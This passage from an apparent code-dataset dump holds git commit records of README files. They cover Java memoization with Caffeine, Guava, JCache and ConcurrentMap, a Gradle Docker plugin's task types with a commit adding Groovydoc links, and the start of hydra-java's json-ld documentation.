link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` 
based implementations cover all functional interfaces from `java.util.function`. Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = 
...;\nCache<INPUT, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` does accept any `Map`, however copies the entries in the map to a new `ConcurrentHashMap` in case the provided `Map` is not a `ConcurrentMap` as well. 
This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite] and link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. 
Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"67ebd339b44f11d0c420c29927e7cad4577683da","subject":"Link to Groovydoc for better usability.","message":"Link to Groovydoc for better usability.\n","repos":"bmuschko\/gradle-docker-plugin,orzeh\/gradle-docker-plugin,cdancy\/gradle-docker-plugin,childnode\/gradle-docker-plugin,odybour\/gradle-docker-plugin,Salmondx\/gradle-docker-plugin,orzeh\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,cdancy\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,odybour\/gradle-docker-plugin,mjacques\/gradle-docker-plugin,mjacques\/gradle-docker-plugin,llamahunter\/gradle-docker-plugin,childnode\/gradle-docker-plugin,llamahunter\/gradle-docker-plugin,Salmondx\/gradle-docker-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"Gradle Docker plugin\n====================\n\nimage:https:\/\/d3oypxn00j2a10.cloudfront.net\/0.12.6\/img\/nav\/docker-logo-loggedout.png[Docker Logo]\n\nGradle plugin for managing link:https:\/\/www.docker.io\/[Docker] images and containers via its\nlink:http:\/\/docs.docker.io\/reference\/api\/docker_remote_api\/[remote API]. The heavy lifting of communicating with the\nDocker remote API is handled by the link:https:\/\/github.com\/docker-java\/docker-java[Docker Java library]. 
Currently,\nversion 0.10.3 is used which assumes Docker's client API v1.13.1.\n\n== Usage\n\nTo use the plugin, include in your build script:\n\n[source,groovy]\n----\nbuildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n classpath 'com.bmuschko:gradle-docker-plugin:0.5'\n }\n}\n\napply plugin: 'com.bmuschko.docker-remote-api'\n----\n\n\n=== Custom task types\n\n==== Misc\n\nThe plugin provides the following general-purpose custom task types:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|DockerInfo |Displays system-wide information.\n|DockerVersion |Show the docker version information.\n|=======\n\n\n==== Images\n\nThe plugin provides the following custom task types for managing images:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/Dockerfile.html[Dockerfile] |Creates a Dockerfile based on the provided instructions.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerBuildImage.html[DockerBuildImage] |Builds an image from a Dockerfile.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerCommitImage.html[DockerCommitImage] |Creates a new image from a container's changes.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerInspectImage.html[DockerInspectImage] |Returns low-level information on the image.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerListImages.html[DockerListImages] |Lists images in registry.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerPullImage.html[DockerPullImage] |Pulls an image from the registry.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerPushImage.html[DockerPushImage] |Pushes an image to a registry.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerRemoveImage.html[DockerRemoveImage] |Removes an image from the filesystem.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerTagImage.html[DockerTagImage] |Tags an image in registry.\n|=======\n\n\n==== Containers\n\nThe plugin provides the following custom task types for managing containers:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerCreateContainer.html[DockerCreateContainer] |Creates a container.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerKillContainer.html[DockerKillContainer] |Kills the container for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerRemoveContainer.html[DockerRemoveContainer] |Removes the container for a given id from the filesystem.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerRestartContainer.html[DockerRestartContainer] |Restarts the container 
for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerStartContainer.html[DockerStartContainer] |Starts the container for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerStopContainer.html[DockerStopContainer] |Stops the container for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerWaitContainer.html[DockerWaitContainer] |Blocks until container for a given id stops, then returns the exit code.\n|=======\n\n\n=== Extension properties\n\nThe plugin defines the following extension properties in the `docker` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`serverUrl` |String |null |The server URL to connect to via Docker's remote API.\n|=======\n\nFor pushing an image to the Docker Hub registry or to a self-hosted one, you will also need to provide credentials in\nthe `credentials` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`username` |String |null |The registry username.\n|`password` |String |null |The registry password.\n|`email` |String |null |The registry email address.\n|=======\n\n\n=== Example\n\nThe following example code demonstrates how to build a Docker image from a Dockerfile, start up a container for this\nimage and exercise functional tests against the running container. At the end of this operation, the container is stopped.\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.*\nimport com.bmuschko.gradle.docker.tasks.image.*\n\ndocker {\n serverUrl = 'http:\/\/remote.docker.com:2375'\n\n credentials {\n username = 'bmuschko'\n password = 'pwd'\n email = 'benjamin.muschko@gmail.com'\n }\n}\n\ntask buildMyAppImage(type: DockerBuildImage) {\n inputDir = file('docker\/myapp')\n tag = 'test\/myapp'\n}\n\ntask createMyAppContainer(type: DockerCreateContainer) {\n dependsOn buildMyAppImage\n targetImageId { buildMyAppImage.getImageId() }\n}\n\ntask startMyAppContainer(type: DockerStartContainer) {\n dependsOn createMyAppContainer\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask stopMyAppContainer(type: DockerStopContainer) {\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask functionalTestMyApp(type: Test) {\n dependsOn startMyAppContainer\n finalizedBy stopMyAppContainer\n}\n----","old_contents":"Gradle Docker plugin\n====================\n\nimage:https:\/\/d3oypxn00j2a10.cloudfront.net\/0.12.6\/img\/nav\/docker-logo-loggedout.png[Docker Logo]\n\nGradle plugin for managing link:https:\/\/www.docker.io\/[Docker] images and containers using via its\nlink:http:\/\/docs.docker.io\/reference\/api\/docker_remote_api\/[remote API]. The heavy lifting of communicating with the\nDocker remote API is handled by the link:https:\/\/github.com\/docker-java\/docker-java[Docker Java library]. 
Currently,\nversion 0.10.3 is used which assumes Docker's client API v1.13.1.\n\n== Usage\n\nTo use the plugin, include in your build script:\n\n[source,groovy]\n----\nbuildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n classpath 'com.bmuschko:gradle-docker-plugin:0.5'\n }\n}\n\napply plugin: 'com.bmuschko.docker-remote-api'\n----\n\n\n=== Custom task types\n\n==== Misc\n\nThe plugin provides the following general-purpose custom task types:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|DockerInfo |Displays system-wide information.\n|DockerVersion |Show the docker version information.\n|=======\n\n\n==== Images\n\nThe plugin provides the following custom task types for managing images:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|Dockerfile |Creates a Dockerfile based on the provided instructions.\n|DockerBuildImage |Builds an image from a Dockerfile.\n|DockerCommitImage |Creates a new image from a container's changes.\n|DockerInspectImage |Returns low-level information on the image.\n|DockerListImages |Lists images in registry.\n|DockerPullImage |Pulls an image from the registry.\n|DockerPushImage |Pushes an image to a registry.\n|DockerRemoveImage |Removes an image from the filesystem.\n|DockerTagImage |Tags an image in registry.\n|=======\n\n\n==== Containers\n\nThe plugin provides the following custom task types for managing containers:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|DockerCreateContainer |Creates a container.\n|DockerKillContainer |Kills the container for a given id.\n|DockerRemoveContainer |Removes the container for a given id from the filesystem.\n|DockerRestartContainer |Restarts the container for a given id.\n|DockerStartContainer |Starts the container for a given id.\n|DockerStopContainer |Stops the container for a given id.\n|DockerWaitContainer |Blocks until container for a given id stops, then returns the exit code.\n|=======\n\n\n=== Extension properties\n\nThe plugin defines the following extension properties in the `docker` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`serverUrl` |String |null |The server URL to connect to via Docker's remote API.\n|=======\n\nFor pushing an image to the Docker Hub registry or to a self-hosted one, you will also need to provide credentials in\nthe `credentials` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`username` |String |null |The registry username.\n|`password` |String |null |The registry password.\n|`email` |String |null |The registry email address.\n|=======\n\n\n=== Example\n\nThe following example code demonstrates how to build a Docker image from a Dockerfile, starts up a container for this\nimage and exercises functional tests agains the running container. 
At the end of this operation, the container is stopped.\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.*\nimport com.bmuschko.gradle.docker.tasks.image.*\n\ndocker {\n serverUrl = 'http:\/\/remote.docker.com:2375'\n\n credentials {\n username = 'bmuschko'\n password = 'pwd'\n email = 'benjamin.muschko@gmail.com'\n }\n}\n\ntask buildMyAppImage(type: DockerBuildImage) {\n inputDir = file('docker\/myapp')\n tag = 'test\/myapp'\n}\n\ntask createMyAppContainer(type: DockerCreateContainer) {\n dependsOn buildMyAppImage\n targetImageId { buildMyAppImage.getImageId() }\n}\n\ntask startMyAppContainer(type: DockerStartContainer) {\n dependsOn createMyAppContainer\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask stopMyAppContainer(type: DockerStopContainer) {\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask functionalTestMyApp(type: Test) {\n dependsOn startMyAppContainer\n finalizedBy stopMyAppContainer\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1404d9ff494ab3e51e391da2a8ffb3f807c6273d","subject":"Adjusted readme for version 0.3.0","message":"Adjusted readme for version 0.3.0\n","repos":"dschulten\/hydra-java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= hydra-java image:https:\/\/travis-ci.org\/dschulten\/hydra-java.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/dschulten\/hydra-java\"]\n:toc:\n:toc-placement: preamble\n\nAnnotate your Java beans and serialize them as http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] with http:\/\/www.hydra-cg.com\/spec\/latest\/core\/[hydra].\n\nStatus: Testing. Since the Hydra Specification is still a draft, expect incompatible changes.\n\nLatest release: 0.3.0\n\n== Problem\n\nThe meaning of json attributes in api responses, their possible values etc. is usually not obvious without referring to some \ninformation coming from outside the resource itself. That is due to the nature of json. Two solutions immediately come to mind. Both are ways of vendor-specific documentation, some are machine-readable, some aren't. \n\nDescribe the type in some sort of json-schema, wadl, raml, swagger or similar and publish it together with the resource. People could even generate classes from this information, if they wish to. My api users coming from a wsdl background scream for something like that. \n\nOr put up documentation pages to describe your ex:doodad extension relation types and make the documentation available by dereferencing http:\/\/example.com\/api\/rels#doodad.\n\nBut one of the rules for a ReSTful API is:\n\n[quote, Roy Fielding]\n____\nA REST API should never have \u201ctyped\u201d resources that are significant to the client. \nSpecification authors may use resource types for describing server implementation behind the interface, \nbut those types must be irrelevant and invisible to the client. \nThe only types that are significant to a client are the current representation\u2019s media type and standardized relation names. 
\n[Failure here implies that clients are assuming a resource structure due to out-of-band information, \nsuch as a domain-specific standard, which is the data-oriented equivalent to RPC's functional coupling].\n____\n\nMy interpretation of this famous http:\/\/roy.gbiv.com\/untangled\/2008\/rest-apis-must-be-hypertext-driven[rant by Roy Fielding]:\n\nA publicly available media-type should give clients all necessary means to interpret a server response, \nand relation names for hyperlinks in the response must be recognizable based on public conventions, so that the client can act upon\nthe responses it receives without knowing the details of a vendor-specific api.\n\nIn other words: If a client is told to make a reservation for a concert ticket, it should be able to recognize what \none-fancy-api requires to achieve that without processing vendor-specific documentation. How can we do that, purely based on a media type and relation names? Do we need hundreds of IANA-registered media types for all kinds of purposes?\n\n== Solution (evolving)\n\nI see http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] (media type application\/ld+json) as a possible way to solve this problem without forcing people to ask me\nabout my vendor-specific documentation, thus decoupling the clients from my server types.\n\nClients should be able to understand a response based on widely available, standardized, public information.\n\nThe json-ld mediatype allows you to bring descriptions of things in the real world from public vocabularies into your json files. With json-ld there *is* a way to say that a json response describes a http:\/\/schema.org\/MusicEvent[MusicEvent] which http:\/\/schema.org\/offers[offers] a http:\/\/schema.org\/Ticket[Ticket] without any vendor-specific documentation, and it can also link to other resources.\n\nA popular vocabulary which describes things on the internet is http:\/\/schema.org. It is used by all major search engines for search engine optimization and is sufficient for basic needs. It also integrates with other vocabularies, \ne.g. by using http:\/\/schema.org\/additionalType[additionalType] to point to http:\/\/purl.org\/goodrelations\/[GoodRelations] classes or by using external enumerated values as shown by http:\/\/schema.org\/DeliveryMethod[DeliveryMethod].\n\n(For those of you about to say that the Semantic Web never took off, please note that json-ld is http:\/\/manu.sporny.org\/2014\/json-ld-origins-2\/[not about the Semantic Web at all]).\n\nhttp:\/\/www.hydra-cg.com\/[Hydra] adds interaction to the mix. 
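It describes exactly how to post a ticket reservation, for instance with an operation on the reservations resource (an illustrative fragment with hypothetical IRIs, not taken from a real API):\n\n[source, Javascript]\n----\n{\n \"@context\": {\"hydra\": \"http:\/\/www.w3.org\/ns\/hydra\/core#\"},\n \"@id\": \"http:\/\/example.com\/events\/1\/reservations\",\n \"hydra:operation\": [{\n \"hydra:method\": \"POST\",\n \"hydra:expects\": \"http:\/\/schema.org\/Reservation\"\n }]\n}\n----\n\n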
So I want to add json-ld information to json objects serialized from my Java beans.\n\nJava beans have no knowledge about the meaning of their bean properties and they do not know what they represent in the real world.\n\nIn the simplest possible case I want to design my json objects so that they can be understood by others based on schema.org.\nBy simply calling my json transfer class `Person` and letting it have an attribute `name`, I want to get a publicly understandable\njson object, like this:\n\n[source, Java]\n----\n @Test\n public void testDefaultVocabIsRendered() throws Exception {\n\n class Person {\n private String name = \"Dietrich Schulten\";\n\n public String getName() {\n return name;\n }\n }\n\n mapper.writeValue(w, new Person());\n }\n----\n\nThe corresponding json-ld object, written by hydra-java:\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\"\n },\n \"@type\": \"Person\",\n \"name\": \"Dietrich Schulten\"\n}\n----\n\nNote that I do not bind my clients to a server type `Person`. \nRather, client and server are talking about the thing http:\/\/schema.org\/Person[Person] as it is known and recognized by all major search engines.\n\nFor a more expressive example consider the json-ld example of http:\/\/schema.org\/MusicEvent[MusicEvent], which shows what a ticket offering could look like.\n\nIn a more complex scenario I want to use my own attribute names and object design and still be able to use schema.org or other vocabs to describe their meaning. In json-ld I can. See below for a listing of vocabularies.\n\n== First Steps\nIt is currently possible to render responses from a https:\/\/github.com\/spring-projects\/spring-hateoas[spring-hateoas] service based on Spring MVC with various message converters.\n\nLook into the https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-sample\/service\/src\/main\/java\/de\/escalon\/hypermedia\/sample\/Config.java[sample configuration] to see how you can set up the hydra message converter, but also the XHTML message converter and the Siren message converter with Spring MVC.\nThe tests in 